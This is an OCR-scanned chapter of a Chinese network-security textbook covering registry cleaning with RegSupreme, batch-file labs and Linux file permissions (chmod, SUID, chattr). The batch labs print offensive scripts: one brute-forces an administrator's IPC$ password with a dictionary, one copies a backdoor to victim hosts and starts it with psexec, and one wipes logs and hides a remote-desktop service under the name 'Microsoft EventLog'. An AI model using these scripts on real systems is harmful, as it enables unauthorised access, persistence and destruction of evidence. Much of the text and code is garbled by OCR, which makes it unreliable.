Ji, Windows 注册 表 文 件 中 很 多 详细 的 清单 会 显示 出 来 ,包括 软件 名 称 、 出 版 公司 \ 很 多 无 
用 的 软件 注册 表 资 料 等 ,用 户 可 以 通过 详细 的 清单 显示 利用 RegSupreme 来 清除 这 些 无 用 


实践 


的 注册 表 资料 。 使 用 方法 如 下 : 

下 载 RegSupreme 后 解压 ,双击 RegSupreme 图 标 运行 程序 ,弹出 如 图 8-39 所 示 的 界 
面 ,包括 软件 管理 器 、 启 动 管理 器 、 注 册 表 管理 器 \ 注 册 表 清理 器 及 注册 表 压 缩 器 等 。 本 实验 
内 容 主 要 以 注册 表 的 使 用 为 主 。 


RegSupreme Pro - Licensed to: Leo van Otterloo 
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图 8-39 RegSupreme 主 界面 


单 击 “ 注 册 表 管理 器 "图标, 或 者 选择 “工具 ”一 “注册 表 管 理 器 ”命令 ,打开 如 图 8-40 所 
示 的 “注册 表 管 理 器 "窗口 。 如 果 要 印 载 某 个 程序 ,只 需 在 “添加 /删除 ] 菜 单 " 选 中 某 个 程序 
后 单 击 * 印 载 ?按钮 ,出现 图 8-41 的 提示 框 , 单 击 * 是 "按钮 完成 印 载 ; 如 果 删 除 某 个 菜单 项 ， 
选中 后 单 击 “ 删 除 ” 按 钮 即 可 ; 如 果 想 删除 某 些 文件 扩展 名 ,在 "外 壳 扩 展 ? 选 项 卡 下 选中 特 
定 的 对 象 后 单 击 “ 删 除 ” 按 钮 即 可 。 
广 册 表 管理 器 
文件 选择 标签 工具 Bb 
ENLLL JAMES | RLN | AANA SESS | 【打开 方式 ] 菜单 | 搜索 .区 | 加 
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图 8-40 注册 表 管 理 器 
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uJ Are ycu sure you vant to completely remove Ask Toolbar and all of its components? 
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图 8-41 ”种 载 程序 提示 框 
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注册 表 清 理 器 不 仅 能 帮助 清理 Windows 注册 表 , 而 且 能 修复 许多 基于 系统 的 注册 表 
错误 ,还 能 使 用 "修复 ?按钮 自动 修复 错误 ,或 使 用 称 为 “ 自 定义 修复 ”的 半自动 错误 修复 功 
能 ,界面 如 图 8-42 所 示 。 用 户 可 以 设置 一 些 需 要 扫描 的 选项 ,还 可 以 添加 特定 的 某 些 字 词 
有 针对 性 地 扫描 并 清理 注册 表 。 

GER] 正在 执行 RegSupreme 工具 时 ,还 可 以 通过 “捷径 ”菜单 命令 快速 切换 某 些 窗 
口 , 如 快速 切换 到 “控制 面板 ”“ 我 的 电脑 ”、“ 资 源 管理 器 "“ 辅 助 工 具 ” 下 的 “注册 表 编 辑 器 ” 
等 窗口 ,如 图 8-43 所 示 。 


广 册 表 清理 器 - x 
IE UAECOCNES MEO OE 
EIIETIEEUETGE Des EE 
i 


RegSupreme Pro - Licensed to: Leo van Otterloo 


EDE TAA EIRENE [不 推荐 ] 
尽 可 能 低地 使 用 CPU ThE 

日 不 显示 可 能 自动 重建 的 项 目 

口 完 成 后 不 弹出 窗口 


ELLE 
ELITS 
3858 O) 
FEIAU 
MITAD 
mw 
命令 提示 符 W 
n = = 注册 表 压 jm. 
gE [-]| 开始 | mm x"o 


图 8-42 ”注册 表 清 理 器 界面 图 8-43 “捷径 ”菜单 
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通过 恰当 地 配置 账户 安全 ,系统 安全 ,服务 安全 ,以 及 有 效 地 维护 注册 表 安 全 操作 系统 
的 安全 配置 方法 ,无 论 是 单机 还 是 服务 器 操作 系统 ,都 能 够 运行 在 一 个 安全 稳定 的 网 络 环 
境 中 。 

关于 注册 表 维 护 的 工具 非常 多 ,只 需 掌 握 一 到 两 种 比较 实用 的 工具 软件 来 维护 注册 表 
即 可 。 


简单 批 处 理应 用 


【实验 目的 】 

掌握 批 处 理 的 简单 应 用 。 

【实验 环境 】 

Windows XP/7/8 操作 系统 。 

【实验 内 容 1] 

批 处 理 命令 在 入 侵 与 安全 中 的 用 途 , 具 体 介 绍 如 下 。 

【任务 8-1】 利用 For 命令 实现 对 一 台 目 标 Windows 2000 主机 的 暴力 密码 破解 。 

用 命令 net use ////ip//ipc$ "password" /u:"administrator" 来 尝试 和 目标 主机 进行 
连接 ,当成 功 时 记 下 密码 。 

最 主要 的 命令 是 for /f i% in (dict. txt) do net use ////ip//ipc$ "i94" /u;"administrator" 。 

用 i% 来 表示 admin 的 密码 ,在 dict. txt 中 这 个 取 1% 的 值 用 net use 命令 来 连接 。 然 后 


实践 


将 程序 运行 结果 传递 给 find 命令 。 
代码 如 下 。 
for /f i% % in (dict. txt) do net use ////ip//ipc$ "i& &" /u:"administrator"|find ": 命 令 成 
功 完 成 ">> D: //ok. txt, 
【任务 8-2】 自动 种 植 后 门 批 处 理 代码 雏形 。 
主要 命令 也 只 有 一 条 ,如 下 (在 批 处 理 文件 中 使 用 For 命令 时 ,指定 变量 使 用 variable). 


@for /f "tokens = 1,2,3 delims= " % % i in (victim. txt) do start call door.bat % %i % %j & &k 


tokens 在 这 里 表示 按 顺序 将 victim. txt 中 的 内 容 传递 给 door. bat 中 的 参数 %i 96) 6k. 

cultivate. bat 用 net use 命令 来 建立 IPC $ 连接 ,并 copy 木马 十 后 门 到 victim ,然后 用 
返回 码 (If errorlever 一) 筛选 成 功 种 植 后 门 的 主机 ,并 echo 出 来 ,或 者 echo 到 指定 的 文件 。 

delims 王 表示 vivtim. txt 中 的 内 容 是 以 空格 来 分 隔 的 。victim. txt 里 的 内 容 根 据 
%%i 16 V6) %%k 表示 的 对 象 来 排列 ,一般 就 是 ip password username, 

Main. bat 代码 如 下 。 


@echo off 

@if " % 1" == "" goto usage 

@for /f "tokens = 1,2,3 delims- " % % i in (victim. txt) do start call IPChack.bat % $i % %j % &k 
(à goto end 

:usage 

(echo run this batch in dos modle.or just double- click it. 

:end 


Door. bat 代码 如 下 。 


(net use //// €&1//ipc$ %3 /u:" %2" 
@if errorlevel 1 goto failed 


(echo Trying to establish the IPC$ connection …… . «OK 
(copy windrv32. exe//// & 1//admin$ //system32 && if not errorlevel 1 echo IP & 1 USER * 2 PWD 
% 3 >> ko. txt 


(@psexec //// % 1 c: //winnt//system32//windrv32. exe 
(@psexec //// % 1 net start windrv32 && if not errorlevel 1 echo % 1 Backdoored >> ko. txt 


上 述 是 一 个 自动 种 植 后 门 批 处 理 的 雏形 ,两 个 批 处 理 和 后 门 程序 (Windrv32. exe? 
PSexec. exe 需 放 在 统一 目录 下 。 
【任务 8-3】 删除 Windows 2000/XP 系统 默认 共享 的 批 处 理 , 代 码 如 下 。 


echo. 

echo If the disklable is not as C: D: E: ,Please chang it youself. 

echo. 

echo example: 

echo If locak disklable are C: D: E: X: Y: Z: , you should chang the command into: 
echo delshare c d e x y z ipc admin print 

echo. 

echo *** you can delete nine shares once in a useing *** 

echo. 


echo. 

echo OK, delshare. bat has deleted all the share you assigned. 
echo. Any questions, feel free to mail to Ex4rch( hotmail.com . 
echo 


:EOF 
echo end of the batch file 


【实验 内 容 2] 
全 面 加 固 系统 的 批 处 理 文件 ,代码 如 下 。 


@echo Windows Registry Editor Version 5.00 > patch. dll 

@echo 

[HKEY LOCAL MACHINE/ /SYSTEM/ /CurrentControlSet//Services//lanmanserver//parameters] >> patch. dll 
(8 echo "AutoShareServer" = dword:00000000 >> patch. dll 

(8) echo "AutoShareWks" = dword:00000000 >> patch. dll 

G)REM [禁止 共享 ] 

(echo [HKEY LOCAL MACHINE//SYSTEM/ /CurrentControlSet//Control//Lsa] >> patch. dll 

@echo "restrictanonymous" = dword:00000001 >> patch. dll 

@REM [禁止 匿名 登录 ] 

( echo [HKEY _ LOCAL  MACHINE//SYSTEM//CurrentControlSet//Services//NetBT//Parameters] >> 
patch. dll 

(8) echo "SMBDeviceEnabled" = dword:00000000 >> patch. dll 

@REM [禁止 文件 访问 和 打印 共享 ] 

( echo [HKEY LOCAL  MACHINE//SYSTEM/ /CurrentControlSet//Services//(9 REMoteRegistry] >> 
patch. dll 

(8 echo "Start" = dword:00000004 >> patch. dll 

(echo [HKEY LOCAL MACHINE//SYSTEM/ /CurrentControlSet//Services//Schedule] >> patch. dll 

(& echo "Start" = dword:00000004 >> patch. dll 

(echo [HKEY LOCAL MACHINE//SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon] >> 
patch. dll 

(8 echo "ShutdownWithou! "= "0" >> patch. d11 

@REM [禁止 登录 前 关机 ] 

(@echo "DontDisplayLastUserName" = "1" >> patch.dll 

@REM [禁止 显示 前 一 个 登录 用 户 名 称 ] 

(regedit /s patch. dll 


【实验 内 容 3] 

清除 被 控 端 所 有 上 日志, 禁止 危险 的 服务 ,并 修改 被 控 端 的 terminnal service ,代码 如 下 。 
(regedit /s patch. dll 

(net stop w3svc 


(net stop event log 
@del c://winnt//systen32//logfiles//w3svcl// * . * /f /q 


实践 


@del c://winnt//system32//1ogfiles//w3svc2// * . * /f /q 

@del c://winnt//system32//config// * . event /f /q 

(Q del c://winnt//system32dtclog// * . * /f /q 

(G del c://winnt// * . txt /£ /q 

@del c://winnt// * . log /f /q 

@net start w3svc 

@net start event log 

@ren [删除 日 志 ] 

(net stop lanmanserver /y 

@net stop Schedule /y 

(&net stop RemoteRegistry /y 

@del patch.dll 

(echo The server has been patched, Have fun. 

@del patch. bat 

@REM [禁止 一 些 危险 的 服务 . ] 

@ echo [HKEY _ LOCAL  MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server// 
WinStations//RDP - Tcp] >> patch. dll 

(8 echo "PortNumber" = dword:00002010 >> patch. dll 

@ echo [HKEY _ LOCAL _ MACHINE//SYSTEM/ /CurrentControlSet//Control//Terminal Server//Wds// 
rdpwd//Tds//tcp >> patch. d11 

(3 echo "PortNumber" = dword:00002012 >> patch. dll 

@echo [HKEY LOCAL MACHINE/ /SYSTEM/ /CurrentControlSet//Services//TermDD] >> patch. dll 

(à echo "Start" = dword:00000002 >> patch. d11 

(echo [HKEY LOCAL MACHINE//SYSTEM/ /CurrentControlSet//Services//SecuService] >> patch. d11 
(3 echo "Start" = dword:00000002 >> patch. d11 

(3) echo "ErrorControl" = dword:00000001 >> patch. dll 

(3) echo " ImagePath" = hex(2) : 25, 00, 53, 00, 79, 00, 73, 00, 74, 00, 65, 00, 6d, 00, 52, 00, 6f, 00, 6f, 
00, //>> patch. dll 

(3) echo 74,00, 25,00, 5c, 00,53, 00, 79, 00, 73, 00, 74, 00, 65, 00, 6d, 00, 33, 00, 32, 00, 5c, 00, 65, //>> 
patch. dll 

(3) echo 00, 76,00, 65, 00, 6e, 00, 74, 00, 6c, 00, 6£, 00, 67, 00, 2e, 00, 65, 00, 78, 00, 65, 00, 00, 00 >> 
patch. dll 

(& echo "ObjectName" = "LocalSystem" >> patch. dll 

(3) echo "Type" = dword:00000010 >> patch. dll 

(& echo "Description" = "Keep record of the program and windows message." >> patch. dll 

(8 echo "DisplayName" = "Microsoft EventLog" >> patch. dll 

(echo [HKEY LOCAL MACHINE//SYSTEM//CurrentControlSet//Services//termservice] >> patch. dll 
(8 echo "Start" = dword:00000004 >> patch. dll 

( copy c: //winnt//systen32//ternmsrv. exe c: //winnt//systen32//eventlog. exe 

(REM [修改 3389 连接 ,端口 为 8210( 十 六 进 制 为 00002012), 44 f Microsoft EventLog 


Linux 文件 系统 安全 


【实验 目的 】 

(1) 熟悉 Linux 文件 系统 的 目录 结构 。 
(2) 掌握 Linux 文件 权限 的 设置 。 

【实验 环境 】 

VMware 十 Redhat Linux Enterprise 5. 0, 


【实验 内 容 】 

Linux 文件 系统 继承 了 UNIX 的 特点 ,采用 树 型 目录 结构 ,最 上 层 是 根 目 录 , 用 /表示 ， 
根 目录 之 下 是 各 层 目录 和 文件 ,系统 在 运行 中 可 以 通过 使 用 命令 或 系统 调用 进入 任何 一 层 
目录 ,并 可 以 根据 权限 的 不 同 对 文件 进行 访问 。 


1. Linux 中 的 文件 系统 类 型 


随 着 Linux 的 不 断 发 展 ,其 所 能 支持 的 文件 格式 系统 也 在 迅速 扩充 ,特别 是 Linux2. 6 
内 核 正式 推出 后 ,出 现 了 大 量 新 的 文件 系统 ,包括 日 志文 件 系 统 Ext4、Ext3、 ReiserFS、 
XFS、JFS 和 其 他 文件 系统 。Linux 核心 可 以 支持 数 十 种 文件 系统 类 型 ,包括 JFS, 
ReiserFS, Ext, Ext2, Ext3, ISO9660、 XFS, Minx, MSDOS, UMSDOS, VFAT, NTFS, 
HPFS,NFS,SMB,SysV 及 PROC 等 。 


2. 文件 系统 安全 性 对 比 


Ext2 fll Ext3 均 可 以 自动 修复 损坏 的 文件 系统 ,但 是 Ext2 和 Ext3 在 自动 修复 上 是 存 
在 风险 的 ,所 以 对 于 新 手 来 说 最 好 能 正常 关机 ,如 使 用 shutdown 或 poweroff 命令 。 

Ext3 是 Ext2 的 升级 版 本 ,其 主要 优点 是 在 Ext2 的 基础 上 加 入 了 记录 数据 的 日 志 
能 , 且 支 持 异步 的 日 志 。 

Ext2 支持 反 删 除 , 这 对 于 从 事 保密 工作 的 人 来 说 是 不 安全 的 ,而 Exc 的 文件 一 旦 删 
除 , 是 不 可 恢复 的 ,所 以 Ext3 可 能 更 适合 于 从 事 机 密 工作 的 用 户 。 

Ext4 是 Linux 内 核 版 本 2. 6. 28 的 重要 部 分 。 它 是 Linux 文件 系统 的 一 次 革命 。 在 很 
多 方面 ,Ext4 相对 于 Ext3 的 进步 要 远 超过 Ext3 相对 于 Ext2 的 进步 。Ext3 相对 于 Ext2 
的 改进 主要 在 于 日 志方 面 ,但 是 Ext4 相对 于 Ext3 的 改进 是 更 深层 次 的 ,是 文件 系统 数据 
结构 方面 的 优化 。 


3. 安全 设 定 文件 和 目录 的 访问 权限 


Linux 系统 中 的 每 个 文件 和 目录 都 有 访问 许可 权限 ,通过 权限 的 设 定 ,可 以 确定 , 谁 可 
以 通过 何 种 方式 对 文件 和 目录 进行 访问 和 操作 。 

(1) Linux 系统 规定 了 如 下 4 种 不 同类 型 的 用 户 。 

。 文件 主 (owner) : Linux 为 每 一 个 文件 都 分 配 了 一 个 文件 所 有 者 。 文 件 或 目录 的 创 
建 者 对 创建 的 文件 或 目录 拥有 特别 使 用 权 。 

° 同 组 用 户 (group): 具有 相同 需求 的 用 户 。 在 Linux 系统 中 ,每 个 文件 要 隶属 于 一 
THAPA. 

* 其 他 用 户 (others): 可 以 访问 系统 的 其 他 人 。 

。 HRHP Coot): 具有 管理 系统 的 特权 。 

(2) Linux 系统 规定 了 如 下 3 种 基本 的 访问 或 目录 的 权限 。 

。 读 (r) 。 

* Sow), 

。 执行 (x) 。 
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每 一 个 文件 或 目录 的 访问 权限 都 有 3 组 ,每 组 用 3 位 表示 ,分 别 为 文件 主 的 读 、 写 和 执 
行 权 限 ; 与 文件 主 同 组 的 用 户 的 读 、 写 和 执行 权限 ; 系统 中 其 他 用 户 的 读 、 写 和 执行 权限 ， 
如 图 8-44 所 示 。 当 用 1s-1 命令 显示 文件 或 目录 的 详细 信息 时 ,最 左边 的 一 列 为 文件 的 存 取 
权限 ,如 图 8-45 所 示 。 


可 读 的 可 写 的 。 可 查询 或 可 执行 的 。” 励 存 取 权限 
一 r w x r w x 一 一 < 
— — 


文件 类 坤 ”文件 主权 限 — 同 组 册 户 权限 HIHA RR 
图 8-44 文件 权限 表示 
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图 8-45 Linux 系统 中 文件 和 目录 的 访问 权限 


确定 一 个 文件 的 权限 后 可 以 使 用 chmod 命令 来 重新 设 定 文件 或 目录 的 权限 ,也 可 以 利 
用 chown 命令 来 更 改 某 个 文件 或 目录 的 所 有 者 。 系 统管 理 员 经 常 使 用 chown 命令 ,在 将 文 
件 复 制 到 另 一 个 用 户 的 目录 下 后 ,让 用 户 拥 有 使 用 该 文件 的 权限 。 但 是 普通 用 户 不 可 以 将 
自己 的 文件 所 有 者 更 改 为 系统 管理 员 所 拥有 。 


4. chmod 命令 


chmod 命令 用 于 改变 文件 或 目录 的 访问 权限 。 用 户 用 它 控制 文件 或 目录 的 访问 权限 。 

适当 设置 文件 权限 是 非常 重要 的 ,不 当 的 权限 设置 很 可 能 会 造成 系统 被 入 侵 、 被 破坏 。 通 常 
要 求 系统 管理 者 以 严谨 的 态度 设置 文件 权限 ,只 赋予 用 户 所 需要 的 文件 存 取 权 限 。 

PEED hh 该 命令 有 两 种 用 法 ,一 种 是 包含 字母 和 操作 符 表 达 式 的 符号 
设 定 法 ; 另 一 种 是 包含 数字 的 绝对 设 定 法 。 

(1) 特 号 设 定 法 的 一 般 格 式 是 “chmod [操作 对 象 ] [操作 符号 ] [mode] 文件 或 目录 
名 ”。 其 中 ,操作 对 象 可 以 是 下 述 字母 中 的 任 一 个 或 者 是 它们 的 组 合 。 

tu 表示 “用 户 (user)”, 即 文件 或 目录 的 所 有 者 。 

* g 表示 “ 同 组 (group) 用 户 ”, 即 与 文件 属 主 有 相同 组 ID 的 所 有 用 户 。 

* o 表示 “其 他 (others) 用 户 ”。 


gF (eres 205 


* a 表示 “所 有 (all) 用 户 ”。 它 是 系统 默认 值 。 
操作 符号 可 以 是 十 (添加 某 个 权限 )、 一 (取消 某 个 权限 )、 二 (赋予 给 定 权 限 并 取消 其 他 
所 有 权限 ,如 果 有 的 话 )。 
设置 mode 所 表示 的 权限 可 用 下 述 字母 的 任意 组 合 。 
° r; 可 读 。 
° wi 可 写 。 
° x; 可 执行 。 只 有 目标 文件 对 某 些 用 户 是 可 执行 的 或 该 目标 文件 是 目录 时 , 才 追 加 x 
(可 执行 ) 属 性 。 
° s: setuid, 在 文件 执行 时 ,把 进程 的 属 主 或 组 ID 设置 为 该 文件 的 文件 主 。 方 式 “u 十 
s” 可 以 设置 文件 的 用 户 ID 位 ,g 十 s? 可 以 设置 组 ID 位。 
° t: setgid, 对 一 个 文件 设置 了 sticky-bit 之 后 ,尽管 其 他 用 户 有 写 权 限 ,也 必须 由 文件 
主 执行 删除 .移动 等 操作 。 对 一 个 目录 设置 了 sticky-bit 之 后 ,存放 在 该 目录 的 文件 
仅 准 许 其 文件 主 执行 删除 .移动 CM 
注意 : s 或 S 权 限 (SUID,Set UID), 人 个 权限 后 , 便 能 得 到 特权 , 任 
意 存 取 该 文件 的 所 有 者 能 使 用 的 全 部 系统 资源 。 黑 客 会 经 常 利 用 这 种 权限 ,以 SUID 配 上 
root 账号 拥有 者 ,无 声 无 息 地 在 系 55 门 , 供 日 后 进出 使 用 。 比 如 对 于 /etc/shadow 
文件 ,只 有 root 用 户 可 以 读 该 文件 ,如 图 8-46 所 示 , 但 是 普通 用 户 也 可 以 通过 使 用 passwd 
命令 修改 自己 的 口令 ,为 什么 呢 ? 原因 就 在 于 passwd 命令 有 s 权限 ,这 样 当 普通 用 户 使 用 
passwd 命令 时 ,他 就 暂时 拥有 了 root 用 户 的 特权 ,必然 也 就 能 修改 自己 的 口令 了 。 但 
SUID 对 目录 是 无 效 的 。 


anglinux ~]# ls -l /etc/shadow 
1 root root 940 Oct 8 23:38 /etc/shadow 


Just /bin/passui 


w mail in /var/spool/mall/ 
glinux -]£ 


8-46 /etc/shadow 和 /usr/bin/passwd 文件 权限 


另外 值得 注意 的 一 点 是 ,虽然 设置 setuid/setgid 属性 非常 方便 实用 ,但 是 由 于 提高 了 
执行 者 的 权限 ,因而 不 可 避免 地 存在 许多 安全 隐患 和 风险 ,所 以 一 般 情况 下 尽 可 能 不 要 使 用 

它 , 并 且 在 实际 的 系统 管理 过 程 中 还 经 常 需要 找 出 设置 有 这 些 标志 的 文件 ,并 对 它们 进行 检 
ERN. - 般 可 以 使 用 相关 命令 来 对 系统 中 具有 特殊 标志 的 文件 进行 寻找 ,如 图 8-47 
所 示 。 


Irootüzhanglinux ^] find -perm «6088 Qiu f -exec ls -ld © N; 
-x 1 root root 18224 Rug ZZ 2811 .^vmware-tonls-distrib/lib/binó4/vmuar 
-urapper 


1 root root 9532 Rug 22 2011 ./umuare-tools-distrib/lib/bin3Z/vmuare 
-user-suid-urapper 
—rootüzhanglinux “IE _ 


图 8-47 查找 特殊 标志 的 目录 


常用 chmod 命令 示例 如 下 。 


# chmod o — x /tmp/filel // 取 消 /tmp/filel 文件 other 组 的 可 执行 权限 


中 的 
存 取 
符号 


MA 
以 这 


实践 


# chmod = rwxr — x—x /tmp/filel // 将 文件 filel 的 权限 设置 为 user 具有 读 、 写 .执行 的 权限 ; 
//group 具有 读 、 执 行 的 权限 ; other 具有 执行 的 权限 


#chmod u + x /tmp/filel // 给 user 加 上 可 执行 的 权限 
# chmod u- s /usr/bin/passwd // 不 允许 用 户 修改 自己 的 密码 
# chmod o + t /share // 不 允许 其 他 用 户 删除 ,也 就 是 粘 沾 属性 


(2) 绝对 设 定 法 就 是 用 数字 的 方法 来 改变 文件 的 存 取 权限 ,用 数字 1 和 0 来 表示 图 8-44 
9 个 权限 位 , 置 为 1 表示 有 相应 的 权限 , 置 为 0 表示 没有 相应 权限 。 例 如 , 某 个 文件 的 
权限 是 文件 主 有 读 、 写 和 执行 的 权限 ,组 用 户 有 读 和 执行 的 权限 ,其 他 用 户 没 有 权限 ,用 
模式 表示 即 rwxr-x---, 用 二 进 制 表示 即 111 101 000, 

为 了 记忆 和 表示 方便 ,通常 将 这 9 位 二 进 制 数 用 等 价 的 3 个 0 一 7 的 十 进 制 数 表示 , 即 
EE 3 个 二 进 制 一 组 数 换 成 一 个 十 进 制 数 。 这 样 ,上 述 二 进 制 数 就 等 价 于 750。 也 可 
样 理 解 ,r 用 4 表示 ,w 用 2 表示 ,x 用 1 表示 ,没有 权限 用 0 表示 。 

绝对 设 定 法 的 表示 格式 为 “chmod [mode] 文件 或 目录 名 ”, 示 例如 下 : 


# chmod 751 /tmp/filel 

// 使 用 十 进 制 来 表示 要 设置 的 权限 , filel 的 权限 设置 为 user 具有 读 、 写 、 执 行 的 权限 ; group 具有 
读 、 执 行 的 权限 ; other 具有 执行 的 权限 

# chmod 1777 /share 

LIR fe iE tb H PIE BR , EER TRUE , xs, t 所 对 应 的 数字 占用 第 一 位 来 表示 


5. chown 命令 
chown 命令 用 于 更 改 某 个 文件 或 目录 的 属 主 和 属 组 ,命令 格式 为 “chown [options] 用 


户 或 组 文件 ”, 相 关 参 数 如 下 。 


° -R: 递归 式 地 改变 指定 目录 及 其 下 的 所 有 子 目录 和 文件 的 拥有 者 。 

° -v: 显示 chown 命令 所 做 的 工作 。 

命令 示例 如 下 : 

# chown http. http /etc/httpd ”// 将 文件 /etc/tmp 的 拥有 者 与 拥有 组 都 设置 为 http 


// 在 使 用 chown 命令 改变 拥有 权 关 系 时 ,可 以 选择 性 地 只 改变 拥有 者 和 拥有 组 ,或 者 是 两 个 同时 改 
变 。 不 过 ,在 指定 新 的 拥有 组 时 ,请 务必 记 住 要 在 名 称 前 加 上 一 个 ". "符号 ,以 便 与 指定 的 拥有 者 区 分 


6. 使 用 文件 的 隐藏 属性 保护 文件 系统 安全 
从 Linux 的 1. 1 系列 内 核 开始 ,Ext2 文件 系统 就 已 开始 支持 一 些 针对 文件 和 目录 的 额 


外 标记 ,或 者 叫 属性 (attribute)。 在 2.2 和 2.4 系列 及 其 高 版 本 的 内 核 中 ,Ext3 文件 系统 
支持 表 8-3 所 示 属 性 的 设置 和 查询 ,而 这 些 属性 使 用 1s 命令 是 无 法 显示 的 。 但 从 另 一 方 看 ， 
这 些 隐藏 属性 对 系统 有 很 大 的 帮助 ,尤其 是 在 系统 安全 方面 。 


表 8-3 ”隐藏 属性 含义 


属性 € x 


A | Atime, 告 诉 系 统 不 要 修改 对 这 个 文件 的 最 后 访问 时 间 


S 


Sync, 一 旦 应 用 程序 对 这 个 文件 执行 了 写 操作 ,使 系统 立刻 把 修改 的 结果 写 到 磁盘 


a 


Append Only, 系 统 只 允许 在 这 个 文件 之 后 追加 数据 ,不 允许 任何 进程 覆盖 或 者 截断 这 个 文件 。 
如 果 目 录 具 有 这 个 属性 ,系统 将 只 允许 在 这 个 目录 下 建立 和 修改 文件 ,而 不 允许 删除 任何 文件 
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续 表 


属性 & x 


只 能 修改 目录 之 下 的 文件 ,不 允许 建立 和 删除 文件 


Immutable, 系统 不 允许 对 这 个 文件 进行 任何 的 修改 。 如 果 目 录 具 有 这 个 属性 ,那么 任何 的 进程 


d | No dump, 在 进行 文件 系统 备份 时 ,dump 程序 将 忽略 这 个 文件 


向 这 个 文件 中 写 人 数据 时 数据 首先 被 压缩 之 后 , 才 写 人 磁盘 


Compress, 系 统 以 透明 的 方式 压缩 这 个 文件 。 从 这 个 文件 读 取 时 ,返回 的 是 解压 之 后 的 数据 ; 而 


s | Secure Delete, 让 系统 在 删除 这 个 文件 时 ,使 用 0 填充 文件 所 在 的 区 域 


这 个 文件 


Undelete, 当 一 个 应 用 程序 请 求 删除 这 个 文件 时 ,系统 会 保留 其 数据 块 ,以 便 以 后 能 够 恢复 删除 


虽然 文件 系统 能 够 接受 并 保留 每 个 属性 的 标志 ,但 是 这 些 属性 不 


核 和 各 种 应 用 程序 的 版 本 。 从 上 述 表 格 可 以 看 出 ,a 属性 和 i 属性 对 提高 文件 系统 的 安全 性 


和 完整 性 有 很 大 的 好 处 。 


- 定 有 效 ,这 依赖 于 内 


在 任何 情况 下 ,标准 的 ls 命令 都 不 会 显示 一 个 文件 或 者 目录 的 扩展 属性 。Ext3 文件 


系统 工具 包 中 有 chattr 和 Isattr 两 个 工具 


(1) lsattr 命令 i 


为 “lsattr [-aR]”, 其 选项 说 明 如 下 。 

° -a: 列 出 目录 中 的 所 有 文件 ,包括 以 . 开头 的 文件 。 
。-d: 以 和 文件 相同 的 方式 列 出 目录 ,并 显示 其 包含 的 内 容 
° -R; 以 递归 的 方式 列 出 目录 的 属性 及 其 内 容 。 

° -v: 列 出 文件 版 本 (用 于 网 络 文件 系统 NFS). 

使 用 Is -a 显示 的 内 容 如 图 8-48 所 示 。 


Trootüzhanglinux zhang]s 1 
cpiofile.sh e 
2b istory .dmrc 
logout 
prof ile d auth — example.sh r 
T "N. forked -1 one2 


forkex c ith setuid. txt 


图 8-48 Is-a 命令 的 显示 结果 


使 用 lsattr -a 命令 显示 的 结果 如 图 8-49 所 示 。 


它们 专门 用 来 设置 和 查询 文件 属性 。 


可 以 看 到 . bash logout 文件 具有 i 属性 ,这 时 候 , 任 何人 不 能 对 这 个 文件 进行 修改 ,如 


果 目 录 具 有 这 个 属性 ,那么 任何 进程 只 能 修改 目录 之 下 的 文 
TF ,不 允许 建立 和 删除 文件 。 

(2) chattr 命令 ,语法 为 “chattr [+ — = ][ ASacdistu] 
[文件 或 目录 ]”, 可 以 通过 以 下 3 种 方式 执行 。 

* chattr 十 Si filename: 给 文件 添加 同步 和 不 可 变 

。 chattr -ai filename: 把 文件 的 只 扩展 (append-only) 

属性 和 不 可 变 属性 去 掉 。 
e chattr —aiA filename t; 使 文件 只 有 ai RI A 属性 。 图 8-49 


1 
_history 


lsattr 命令 显示 的 结果 


208 


tense msn (E) 


最 后 ,每 个 命令 都 支持 -R 选项 ,用 于 递归 地 对 目录 和 其 子 目 录 进 行 操作 。 图 8-50 显示 
的 是 为 /etc/shadow 文件 加 上 i 属性 的 示例 代码 。 

chattr 这 个 指令 是 非常 重要 的 ,尤其 是 在 系统 的 安全 性 上 面 。 由 于 这 些 属性 是 隐藏 的 
性 质 , 所 以 需要 lsattr 指令 才能 看 到 。 其 中 ,十 i 属性 是 比较 重要 的 ,因为 它 可 以 让 一 个 文件 
无 法 被 改动 ,对 于 需要 强烈 的 系统 安全 的 人 来 说 是 相当 重要 的 。 在 Linux 系统 中 ,如 果 一 个 
用 户 以 root 的 权限 登录 ,文件 系统 的 权限 控制 将 无 法 对 root 用 户 和 以 root 权限 运行 的 进 
程 进行 任何 限制 。 这 样 对 于 Linux 类 的 操作 系统 ,如 果 攻 击 者 通过 远程 或 者 本 地 攻击 获得 
root 权限 ,将 可 能 对 系统 造成 严重 的 破坏 。 而 Ext3 文件 系统 可 以 作为 最 后 一 道 防线 ,最 大 
限度 地 减 小 系统 被 破坏 的 程度 ,并 保存 攻击 者 的 行踪 。 也 就 是 说 在 任何 情况 下 ,对 具有 不 可 
修改 (immutable) 属 性 的 文件 进行 任何 修改 都 会 失败 ,不 管 是 否 是 root 用 户 。 但 是 i 属性 
也 可 以 删除 ,这 并 不 能 从 根本 上 改善 文件 系统 的 安全 性 ,只 不 过 是 给 攻击 者 制造 一 些小 麻烦 
而 已 。 如 图 8-50 所 示 示 例 ,给 shadow 文件 加 上 了 i 属性 ,也 就 意味 着 该 文件 不 能 被 修改 ， 
如 果 要 添加 用 户 的 话 , 是 不 能 添加 成 功 的 ,这 时 候 必 须 去 掉 i 属性 ,如 图 8-51 所 示 。 当 然 , 这 
里 面 很 多 属性 是 需要 root 才能 设 定 的 。 


8-50 ”为 /etc/shadow 文件 加 上 i 属性 8-51 去掉 /etc/shadow 的 i 属性 


Linux 主机 直接 暴露 在 Internet 或 者 位 于 其 他 危险 的 环境 时 ,有 很 多 shell 账户 或 者 提 
fk HTTP 和 FTP 等 网 络 服务 ,一 般 应 该 在 安装 配置 完成 后 使 用 如 图 8-52 所 示 的 命令 。 


图 8-52 为 一 些 重要 的 目录 设置 特殊 属性 


如 果 很 少 对 账户 进行 添加 、 变 更 或 者 删除 ,把 /home 本 身 设置 为 immutable 属性 也 不 
会 造成 什么 问题 。 在 很 多 情况 下 ,整个 /usr 目录 树 也 应 该 具有 不 可 改变 属性 。 实 际 上 , 除 
了 对 /usr 目录 使 用 chattr 一 R 十 i /usr/ 命令 外 ,还 可 以 在 /etc/fstab 文件 中 使 用 ro 选 
项 ,使 /usr 目录 所 在 的 分 区 以 只 读 的 方式 加 载 。 另 外 ,把 系统 日 志文 件 设置 为 只 能 添加 属 
性 Cappend-only) ,将 使 入侵 者 无 法 擦 除 自己 的 踪迹 。 当 然 ,如 果 使 用 这 种 安全 措施 ,需要 系 
统管 理 员 修改 管理 方式 。 


Linux 账户 安全 


【实验 目的 】 

